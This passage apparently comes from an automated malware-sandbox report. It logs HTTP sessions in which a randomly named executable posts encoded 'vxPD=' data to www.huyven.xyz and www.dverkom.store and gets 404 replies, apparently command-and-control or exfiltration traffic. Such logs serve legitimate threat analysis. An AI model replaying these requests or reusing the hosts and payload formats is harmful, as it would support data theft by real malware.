                                                                    Data Raw: 76 78 50 44 3d 6f 59 4f 6d 50 2f 4e 53 47 69 46 70 4c 68 47 33 68 43 44 4f 59 41 2f 45 45 55 62 62 45 36 73 68 59 62 72 73 6d 75 57 67 72 72 46 49 43 4a 46 67 36 41 55 39 45 7a 54 50 6d 68 77 4a 50 30 65 53 61 33 77 51 6e 33 33 46 56 38 6c 47 38 6d 55 4c 67 74 70 31 4c 4a 34 32 5a 2f 6d 57 55 43 66 6b 49 2b 6d 4b 38 4a 73 77 49 73 43 34 4a 61 4d 7a 46 43 2f 77 4c 51 37 35 31 76 44 56 37 32 38 6d 52 6c 67 4c 61 73 78 48 35 71 6a 52 69 37 33 6d 34 4e 72 76 4b 44 51 38 62 6b 57 38 73 57 63 44 35 72 72 43 6e 55 6c 78 6f 58 71 7a 4e 53 49 74 58 75 73 66 2f 50 2b 2b 69 6e 34 57 5a 48 48 5a 5a 76 45 4b 52 53 6f 70 4a 57 6e 4a 2f 63 53 6b 6c 44 4b 6f 2b 6f 6e 7a 62 4f 45 6d
                                                                    Data Ascii: vxPD=oYOmP/NSGiFpLhG3hCDOYA/EEUbbE6shYbrsmuWgrrFICJFg6AU9EzTPmhwJP0eSa3wQn33FV8lG8mULgtp1LJ42Z/mWUCfkI+mK8JswIsC4JaMzFC/wLQ751vDV728mRlgLasxH5qjRi73m4NrvKDQ8bkW8sWcD5rrCnUlxoXqzNSItXusf/P++in4WZHHZZvEKRSopJWnJ/cSklDKo+onzbOEm
                                                                    Oct 30, 2024 04:57:33.264122009 CET533INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 30 Oct 2024 03:57:33 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.549997162.0.238.246801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:57:35.137769938 CET1758OUTPOST /dbbh/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1241
                                                                    Host: www.huyven.xyz
                                                                    Origin: http://www.huyven.xyz
                                                                    Referer: http://www.huyven.xyz/dbbh/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 6f 59 4f 6d 50 2f 4e 53 47 69 46 70 4c 68 47 33 68 43 44 4f 59 41 2f 45 45 55 62 62 45 36 73 68 59 62 72 73 6d 75 57 67 72 71 39 49 43 66 5a 67 34 6d 63 39 46 7a 54 50 39 68 77 49 50 30 66 4f 61 33 49 63 6e 33 37 37 56 2b 4e 47 2b 44 49 4c 77 4d 70 31 43 4a 34 32 52 66 6d 58 4a 53 66 4c 49 2b 32 4f 38 4a 38 77 49 73 43 34 4a 5a 55 7a 47 57 72 77 4a 51 37 36 6a 2f 44 6a 71 6d 38 4f 52 6c 70 32 61 73 31 78 34 61 44 52 73 2f 72 6d 39 2b 44 76 58 54 51 45 59 6b 57 6b 73 57 52 62 35 72 6e 6b 6e 56 51 65 6f 51 75 7a 4f 6e 39 50 4e 74 38 4a 39 4f 4b 68 67 56 59 6c 4d 67 50 64 48 4d 55 68 61 77 35 49 53 32 6a 62 6f 70 6d 39 73 53 76 52 6a 70 76 6f 53 4b 70 75 67 5a 6c 48 4c 47 63 61 4d 55 67 78 66 74 50 69 35 43 4d 39 6b 63 49 48 7a 66 78 4c 77 6f 46 50 37 61 6f 59 6b 41 50 62 65 76 66 4c 37 4c 76 30 6c 78 78 4e 33 34 46 53 57 56 71 74 6a 65 57 2b 7a 5a 46 6e 49 50 62 69 62 32 6a 2f 39 79 4d 50 62 6e 6a 73 42 36 73 6e 4e 78 4a 38 45 34 30 52 30 6d 43 64 47 64 5a 34 69 56 67 59 4c 51 77 4f 35 [TRUNCATED]
                                                                    Data Ascii: vxPD=oYOmP/NSGiFpLhG3hCDOYA/EEUbbE6shYbrsmuWgrq9ICfZg4mc9FzTP9hwIP0fOa3Icn377V+NG+DILwMp1CJ42RfmXJSfLI+2O8J8wIsC4JZUzGWrwJQ76j/Djqm8ORlp2as1x4aDRs/rm9+DvXTQEYkWksWRb5rnknVQeoQuzOn9PNt8J9OKhgVYlMgPdHMUhaw5IS2jbopm9sSvRjpvoSKpugZlHLGcaMUgxftPi5CM9kcIHzfxLwoFP7aoYkAPbevfL7Lv0lxxN34FSWVqtjeW+zZFnIPbib2j/9yMPbnjsB6snNxJ8E40R0mCdGdZ4iVgYLQwO5CqMjyxJdBbK6OCvdgK5nm8cmfNeq1TH0YmhaiOeRo0mXiV3hU+VKMBZbx71hWk7R41Y1XRrZ5IHITLjeSnN+MdtdWNXptUFuZ7dd5aCtLD0y34WRbyky6sT03b0wzOMg9NilYsUDsI9lyB+H+cgMB8p+OG980VLCdhfCkPwLGahEBh3/ebNR7uRuCOXM6L8cDO6JQRziTu2cVKSgazt8vGTkqM7feaG+HWKbmFiAWL5Izpb9TeEdyXRiph+3fnpp6WVDDVdVL3medufoMKi4ZU7ipoJ1UkZ+/Bkz3/H5TFeVjSUUls/oHdofMHYjs2o2M4Dir23q06IQxNkP2Hg/uojvYleDXh6eV52kDToaGbx7nppZbZyv4KOFlVFGem2j5x5Itf3KIJzwJN24wgqHVeyc8LwsBmfzprLRfGI6F06QPn42RG45JvLY3WmNCRQXDXGL3egvlS3QrmMMHhLMa0T9rdYKUHmM0caVrI31YK8JTe1Eht11wQIqA7lsbSD2KbJLmzpBnXdz2t+B9ughmRUW6oDGGEnS0moNdRvtb/TZq3NCD86FNmh2+doT2rIb4aMDkG7WvhgnhmvTcqjmM57trIAe1EnoiT2Py6muvmQNaoP3qG3bm/C+WlHaSDCKOLmbvg6jA61mB/mH/eqNOhShZIeEO0aVnJ [TRUNCATED]
                                                                    Oct 30, 2024 04:57:35.808804035 CET533INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 30 Oct 2024 03:57:35 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.549998162.0.238.246801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:57:37.681313992 CET469OUTGET /dbbh/?vxPD=lamGMLAlOh98dBGrtynney6GPlHEM5QlQKbLlI7thJxhBrd30wtgMCvSkAg0SEbnfS5+p1L4UOQ6xDYv4dERCKoYatamVnzjD+qK6bhsesKkSZw/Bnu8WzfQ6tLw1Gl2PQ==&7JH=bvSPlHnHQ4A HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.huyven.xyz
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Oct 30, 2024 04:57:38.351922989 CET548INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 30 Oct 2024 03:57:38 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.54999931.31.196.17801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:57:43.523920059 CET730OUTPOST /fbcx/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 205
                                                                    Host: www.dverkom.store
                                                                    Origin: http://www.dverkom.store
                                                                    Referer: http://www.dverkom.store/fbcx/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 31 58 46 43 72 2b 30 46 74 32 7a 58 6f 32 31 68 69 61 6f 68 56 37 57 2f 6f 2b 2b 53 52 4b 63 31 4f 31 31 50 36 59 64 61 55 68 70 37 44 2f 43 65 45 6a 48 54 52 2f 52 61 63 51 37 59 6b 6e 53 72 4a 6a 53 6d 67 70 78 55 5a 79 59 58 46 79 30 6a 54 4b 59 6f 6c 50 56 74 36 78 50 76 46 55 31 69 51 59 6d 58 75 50 4c 42 76 45 44 52 6a 64 45 33 73 35 6f 48 39 56 67 52 50 4e 41 53 49 68 2b 34 37 79 73 50 36 72 45 76 36 32 6a 62 53 6f 52 44 58 6d 54 58 68 33 78 76 50 66 55 30 34 41 4b 4b 36 66 33 30 6a 6b 43 73 6b 41 54 78 2b 30 69 31 31 33 39 59 67 6e 6a 39 2f 71 38 73 35 4e 49 6a 76 72 35 67 71 30 59 3d
                                                                    Data Ascii: vxPD=1XFCr+0Ft2zXo21hiaohV7W/o++SRKc1O11P6YdaUhp7D/CeEjHTR/RacQ7YknSrJjSmgpxUZyYXFy0jTKYolPVt6xPvFU1iQYmXuPLBvEDRjdE3s5oH9VgRPNASIh+47ysP6rEv62jbSoRDXmTXh3xvPfU04AKK6f30jkCskATx+0i1139Ygnj9/q8s5NIjvr5gq0Y=
                                                                    Oct 30, 2024 04:57:44.516885042 CET375INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 30 Oct 2024 03:57:44 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.55000031.31.196.17801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:57:46.085351944 CET750OUTPOST /fbcx/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 225
                                                                    Host: www.dverkom.store
                                                                    Origin: http://www.dverkom.store
                                                                    Referer: http://www.dverkom.store/fbcx/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 31 58 46 43 72 2b 30 46 74 32 7a 58 70 58 46 68 6b 35 41 68 54 62 57 2b 72 2b 2b 53 65 71 63 50 4f 30 4a 50 36 64 39 4b 42 45 35 37 44 66 79 65 46 69 48 54 57 2f 52 61 4a 67 37 5a 36 58 53 67 4a 6a 65 41 67 6f 64 55 5a 7a 38 58 46 33 51 6a 51 39 4e 2b 6b 66 56 76 6d 78 50 74 4c 30 31 69 51 59 6d 58 75 50 50 72 76 41 58 52 6a 74 55 33 73 59 6f 45 6a 46 67 51 49 4e 41 53 4d 68 2b 38 37 79 73 70 36 71 49 52 36 31 62 62 53 70 68 44 58 33 54 55 76 33 78 70 46 2f 56 6e 72 53 33 50 77 4a 6a 42 6f 6b 37 57 37 7a 2f 75 32 69 50 66 76 56 31 77 7a 48 50 46 76 35 30 62 6f 39 70 4b 31 49 70 51 30 6a 4e 35 4b 63 61 4b 57 56 6b 63 79 67 35 5a 46 72 58 61 30 61 69 30
                                                                    Data Ascii: vxPD=1XFCr+0Ft2zXpXFhk5AhTbW+r++SeqcPO0JP6d9KBE57DfyeFiHTW/RaJg7Z6XSgJjeAgodUZz8XF3QjQ9N+kfVvmxPtL01iQYmXuPPrvAXRjtU3sYoEjFgQINASMh+87ysp6qIR61bbSphDX3TUv3xpF/VnrS3PwJjBok7W7z/u2iPfvV1wzHPFv50bo9pK1IpQ0jN5KcaKWVkcyg5ZFrXa0ai0
                                                                    Oct 30, 2024 04:57:46.972646952 CET375INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 30 Oct 2024 03:57:46 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.55000131.31.196.17801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:57:48.620018005 CET1767OUTPOST /fbcx/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1241
                                                                    Host: www.dverkom.store
                                                                    Origin: http://www.dverkom.store
                                                                    Referer: http://www.dverkom.store/fbcx/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 31 58 46 43 72 2b 30 46 74 32 7a 58 70 58 46 68 6b 35 41 68 54 62 57 2b 72 2b 2b 53 65 71 63 50 4f 30 4a 50 36 64 39 4b 42 45 78 37 44 4d 36 65 45 42 66 54 58 2f 52 61 56 77 37 55 36 58 53 39 4a 67 75 4d 67 6f 67 68 5a 78 30 58 4b 31 59 6a 59 73 4e 2b 75 66 56 76 74 52 50 73 46 55 31 33 51 5a 57 62 75 50 66 72 76 41 58 52 6a 72 59 33 6c 70 6f 45 68 46 67 52 50 4e 41 4f 49 68 2b 45 37 32 35 63 36 71 4e 6b 35 45 37 62 56 4a 78 44 52 46 72 55 6e 33 78 72 47 2f 55 67 72 53 37 45 77 4e 44 37 6f 6b 50 73 37 77 66 75 6e 6c 37 44 38 6b 42 79 6c 56 66 6b 6f 37 6b 6e 36 72 39 36 32 70 4e 62 70 54 35 39 4c 50 43 71 57 67 63 4f 7a 45 77 74 51 50 2f 75 33 61 62 2b 37 51 46 37 51 33 61 78 67 67 38 4e 6d 51 42 31 55 4e 4e 63 51 53 67 74 2f 78 71 70 2f 32 33 64 6d 37 63 78 71 30 74 72 61 5a 41 5a 6b 74 76 6d 50 32 6b 73 49 30 64 2b 38 4d 31 37 73 66 35 6f 56 46 75 6b 45 32 37 34 32 4e 4b 73 70 6d 34 6f 72 4d 57 37 56 43 54 42 34 66 32 6c 52 46 33 63 44 46 33 6d 53 42 54 45 4c 48 53 37 73 7a 6d 66 2b [TRUNCATED]
                                                                    Data Ascii: vxPD=1XFCr+0Ft2zXpXFhk5AhTbW+r++SeqcPO0JP6d9KBEx7DM6eEBfTX/RaVw7U6XS9JguMgoghZx0XK1YjYsN+ufVvtRPsFU13QZWbuPfrvAXRjrY3lpoEhFgRPNAOIh+E725c6qNk5E7bVJxDRFrUn3xrG/UgrS7EwND7okPs7wfunl7D8kBylVfko7kn6r962pNbpT59LPCqWgcOzEwtQP/u3ab+7QF7Q3axgg8NmQB1UNNcQSgt/xqp/23dm7cxq0traZAZktvmP2ksI0d+8M17sf5oVFukE2742NKspm4orMW7VCTB4f2lRF3cDF3mSBTELHS7szmf+ARguo2TcKXEa25EV2EZ6rAP6MB4fcBz7KMMNB0fj7hF0OBrtAW8iw5kNArdHlw3umTrlUJCvNSSr0JKGHgnIVTwge6XKKoYYpilMQegoO4Z+rc3lF8hzgxSC7/GVma+y182dBDDzFzrSnsLirXM7aJKI9Lm5h9XInGtHLDkcbguyo9AZwGpT1IqNXGgMWhem/zKzcMib6OsmpMdNRkeIzqrvgGEbwzBV6QylDzxUdXMYj9DhjPZ5E3K1TpzgGrl6TchhRcbbCOLxgtjKMmpFUDjxi/sq/dxqvQWcPi1c6hlJBrTZOfdZhoL+Zuxu0y3bSrUiOxCcjCbXuomzi+sBKU0xWnS80caNf8K81XI9qYoClPtFk5u5WY96ixYkuikUR3ZC7gE6pBQsviOPqrMbgQCo0q/+jymR+qRd+ytS9IcoWOJFcW+L5/psrgaJxY37xSCqrahBO9zJKosJ44ZH3Fgp0Nae9BkqbOneNoZKWmq4jyJfoaEyfelo/ItqVcD9PJEAQ0/ZfWmZA3jvZBLCyqd+JakzGiW36f2gVeIsrrUcm2nBFiQjsXIXkZxaNO5SNxoXU92WHCi0PD5d6dLzR+LkaXdVHoL8c2w2L8UGnpT15qphhXbemFRIsfaL4TIGBGxXtLr9vlUk868WsvrjL1HWsPGhUrxoE7 [TRUNCATED]
                                                                    Oct 30, 2024 04:57:49.496403933 CET375INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 30 Oct 2024 03:57:49 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    20192.168.2.55000231.31.196.17801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:57:51.164398909 CET472OUTGET /fbcx/?vxPD=4VtioKF/mjPo/GpRkpc0Qv24mdyWT6seFEVk09A1HDpPAPyqNiGIX689XALIlCi8LzaCpYl7SzxyH3kwVthnk7FHu2LJAC1pbav8pNbFzRj12JkmuKEoiUFHOdUjAAbLgw==&7JH=bvSPlHnHQ4A HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.dverkom.store
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Oct 30, 2024 04:57:52.067540884 CET733INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 30 Oct 2024 03:57:51 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
